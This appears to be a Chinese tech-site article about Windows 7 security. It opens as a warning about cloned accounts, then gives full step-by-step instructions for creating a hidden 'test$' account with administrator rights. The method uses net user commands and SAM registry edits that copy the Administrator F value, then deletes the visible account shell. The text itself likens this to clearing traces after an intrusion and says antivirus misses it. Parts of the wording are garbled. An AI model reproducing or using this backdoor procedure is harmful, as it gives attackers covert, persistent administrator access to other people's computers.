win7已经上市有一段时间了,与之相比较的前几个版本的系统,win7的安全性和失密 性都是最高的。不过,现在的病毒真的是无孔不入,只需 你不是完美的就会被入侵。最近发现,只需 给你一个克隆的账户,就会被黑客入侵,杀毒软件也杀不出来。
点击“开始”→“运行”,输入“cmd”运行“命令提示符”,输入如下命令:net user test$ /add并回车,这样就可以在系统中建立一个名为test$的帐户。继续输入:net localgroup administrators test$ /add并回车,这样就可以把test$帐户提升到管理员权限。
运行
命令提示符
点击“开始”→“运行”,输入“regedit”后回车,弹出“注册表编辑器”。在regedit中来到“HKEY_LOCAL_MACHINESAMSAM”处——
注册编辑器
点击“编辑”菜单→“权限”,在弹出的“SAM的权限”编辑窗口当选 “administrators”帐户,在下方的权限设置处勾寻完全控制”,完成后点击“确定”即可。
编辑器
在“运行”中输入“regedit”运行“注册表编辑器”,定位到“HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsersNames”处,点击隐藏帐户“test$”,在右边显示的键值中的“类型”一项显示为0x404,向上来到“HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers”处,可以找到“00000404”这一项,这两者是互相 对应的,隐藏帐户“test$”的一切 信息都在“00000404”这一项中。同样的,我们可以找到“administrator”帐户所对应的项为“000001F4”。
运行
将“test$”的键值导出为test$.reg,同时将“00000404”和“000001F4”项的F键值分别导出为user.reg,admin.reg。用“记事本”打开admin.reg,将其中“F”值后面的内容复制下来,替换user.reg中的“F”值内容,完成后保存。
“命令提示符”中输入“net user test$ /del”命令,将我们建立的隐藏帐户删除。别紧张,这一步只是删除了隐藏帐户的“空壳”,就像入侵后清理痕迹一样,做好的隐藏帐户是不会发作 改动 的。最后,我们双击test$.reg和user.reg这两个注册表文件,将它们导入到注册表中就大功告成了。
编辑点评:虽然操作有点繁琐,不过思路还是蛮简单的,通过以上的修改。我们就建立了一个隐藏的账户。 |